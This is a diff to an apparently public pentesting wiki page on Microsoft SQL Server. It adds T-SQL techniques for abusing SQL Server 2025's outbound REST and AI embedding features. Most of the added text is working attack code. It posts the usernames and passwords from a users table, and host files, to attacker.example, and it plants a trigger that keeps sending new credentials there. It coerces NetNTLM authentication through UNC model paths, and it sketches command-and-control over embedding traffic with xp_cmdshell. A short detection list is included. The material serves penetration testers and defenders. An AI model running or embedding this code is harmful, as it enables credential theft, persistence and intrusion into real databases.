Oops, I Weaponized the Database Abusing AI Features in SQL S...

src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md

@@ -504,6 +504,133 @@ SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='ADMINISTE
 https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))--
 ```
 
+
+### SQL Server 2025 AI / REST abuse
+
+SQL Server 2025 adds **database-native outbound HTTPS** and **external embedding model** support, which creates new exfiltration, coercion, persistence, and C2 primitives.
+
+#### `sp_invoke_external_rest_endpoint` for HTTPS exfiltration
+
+Useful constraints before abusing it:
+
+- Disabled by default on **SQL Server 2025**. A user with **`ALTER SETTINGS`** (commonly `sysadmin` / `serveradmin`) must enable it:
+
+```sql
+EXECUTE sp_configure 'external rest endpoint enabled', 1;
+RECONFIGURE WITH OVERRIDE;
+```
+
+- The caller needs **`EXECUTE ANY EXTERNAL ENDPOINT`**.
+- Requests must use **HTTPS/TLS** with a valid certificate chain.
+- Sent/received payloads can reach **100 MB**, making chunked table dumps practical.
+
+Serialize rows with `FOR JSON AUTO` and send them directly from the SQL Server process:
+
+```sql
+DECLARE @payload NVARCHAR(MAX);
+SELECT @payload = (
+    SELECT username, password
+    FROM dbo.app_users
+    FOR JSON AUTO
+);
+EXEC sp_invoke_external_rest_endpoint
+    @url = N'https://attacker.example/collect',
+    @method = 'POST',
+    @payload = @payload;
+```
+
+Because the network origin is the **database engine**, this is quieter than dropping a separate implant or calling PowerShell.
+
+#### File exfiltration via `OPENROWSET` + REST endpoint
+
+If the SQL Server service account can read a file, combine `OPENROWSET(BULK ...)` with the REST primitive to exfiltrate it over HTTPS:
+
+```sql
+DECLARE @payload NVARCHAR(MAX);
+SELECT @payload = BulkColumn
+FROM OPENROWSET(BULK N'C:\Windows\System32\drivers\etc\hosts', SINGLE_CLOB) AS x;
+EXEC sp_invoke_external_rest_endpoint
+    @url = N'https://attacker.example/files?name=hosts.txt',
+    @method = 'POST',
+    @headers = N'{"Content-Type":"text/plain"}',
+    @payload = @payload;
+```
+
+#### Persistent row exfiltration with triggers
+
+Instead of repeatedly dumping a table, weaponize an `AFTER INSERT` trigger so new rows are posted automatically:
+
+```sql
+CREATE TRIGGER tr_exfil_users ON dbo.app_users AFTER INSERT AS
+DECLARE @payload NVARCHAR(MAX);
+SELECT @payload = (SELECT username, password FROM inserted FOR JSON AUTO);
+EXEC sp_invoke_external_rest_endpoint
+    @url = N'https://attacker.example/collect',
+    @method = 'POST',
+    @payload = @payload;
+```
+
+This is a **database-resident persistence** primitive for future credential or secret capture.
+
+#### `CREATE EXTERNAL MODEL` / `AI_GENERATE_EMBEDDINGS`
+
+`CREATE EXTERNAL MODEL` stores an embedding endpoint definition inside the database. `AI_GENERATE_EMBEDDINGS` then sends attacker-controlled strings to that endpoint and returns the JSON vector response.
+
+```sql
+CREATE EXTERNAL MODEL attacker_model
+WITH (
+    LOCATION = N'https://attacker.example/v1/embeddings',
+    API_FORMAT = 'OpenAI',
+    MODEL_TYPE = EMBEDDINGS,
+    MODEL = N'mock-embedding-model'
+);
+SELECT AI_GENERATE_EMBEDDINGS(N'checkin' USE MODEL attacker_model);
+```
+
+Useful permission notes:
+
+- Creating/altering models requires **`CREATE EXTERNAL MODEL`** or **`ALTER ANY EXTERNAL MODEL`**.
+- A principal needs **`EXECUTE`** on the external model to use it.
+- `AI_GENERATE_EMBEDDINGS` also depends on **`external rest endpoint enabled`**.
+
+#### NetNTLM coercion via ONNX Runtime UNC paths
+
+If ONNX external models are enabled, `LOCATION` and `LOCAL_RUNTIME_PATH` can point to a **UNC path**. When the model is invoked, SQL Server tries to access the attacker SMB share and authenticates before the runtime initialization fails.
+
+```sql
+EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
+EXEC sp_configure 'external AI runtimes enabled', 1; RECONFIGURE;
+ALTER DATABASE SCOPED CONFIGURATION SET PREVIEW_FEATURES = ON;
+CREATE EXTERNAL MODEL onnx_unc_test
+WITH (
+    LOCATION = N'\\attacker\share',
+    LOCAL_RUNTIME_PATH = N'\\attacker\share',
+    API_FORMAT = 'ONNX Runtime',
+    MODEL_TYPE = EMBEDDINGS,
+    MODEL = 'test'
+);
+SELECT AI_GENERATE_EMBEDDINGS(N'test' USE MODEL onnx_unc_test);
+```
+
+This behaves like other coercion gadgets, but the trigger is an **AI model invocation** instead of `xp_dirtree`.
+
+#### C2 over embedding traffic
+
+An attacker-controlled HTTPS service can impersonate an **OpenAI-compatible embeddings endpoint**. A T-SQL loop (or an **UNSAFE CLR** assembly loaded from hex) can:
+
+- check in with `AI_GENERATE_EMBEDDINGS(N'checkin' USE MODEL <model>)`
+- parse tasking with `OPENJSON`
+- execute OS commands with `xp_cmdshell` **or** directly via CLR / `CreateProcessW`
+- send command output back in another embedding request
+
+This turns normal-looking embedding traffic into a **database-native C2 transport**.
+
+#### Detection ideas
+
+- Query **`sys.external_models`** and alert on `CREATE/ALTER/DROP EXTERNAL MODEL`.
+- Monitor enablement of **`external rest endpoint enabled`** and **`external AI runtimes enabled`**.
+- If you use SQL Audit / XEvents, capture the SQL text for these statements and review **`external_rest_endpoint_summary`** and **`ai_generate_embeddings_summary`** events.
+
 ### **RCE/Read files executing scripts (Python and R)**
 
 MSSQL could allow you to execute **scripts in Python and/or R**. These code will be executed by a **different user** than the one using **xp_cmdshell** to execute commands.
@@ -781,6 +908,11 @@ You probably will be able to **escalate to Administrator** following one of thes
 - [HTB: DarkZero - linked-server credential mapping to cross-forest RCE](https://0xdf.gitlab.io/2026/04/04/htb-darkzero.html)
 - [HTB: Signed - MSSQL coercion to silver ticket sysadmin](https://0xdf.gitlab.io/2026/02/07/htb-signed.html)
 - [Microsoft Learn - sp_helplinkedsrvlogin (Transact-SQL)](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-helplinkedsrvlogin-transact-sql)
+- [SpecterOps - Oops, I Weaponized the Database: Abusing AI Features in SQL Server 2025](https://specterops.io/blog/2026/06/10/oops-i-weaponized-the-database-abusing-ai-features-in-mssql-2025)
+- [gershsec/mssql2025-poc](https://github.com/gershsec/mssql2025-poc)
+- [Microsoft Learn - sp_invoke_external_rest_endpoint (Transact-SQL)](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-invoke-external-rest-endpoint-transact-sql?view=sql-server-ver17)
+- [Microsoft Learn - CREATE EXTERNAL MODEL (Transact-SQL)](https://learn.microsoft.com/en-us/sql/t-sql/statements/create-external-model-transact-sql?view=sql-server-ver17)
+- [Microsoft Learn - AI_GENERATE_EMBEDDINGS (Transact-SQL)](https://learn.microsoft.com/en-us/sql/t-sql/functions/ai-generate-embeddings-transact-sql?view=sql-server-ver17)
 - [https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users)
 - [https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/)
 - [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)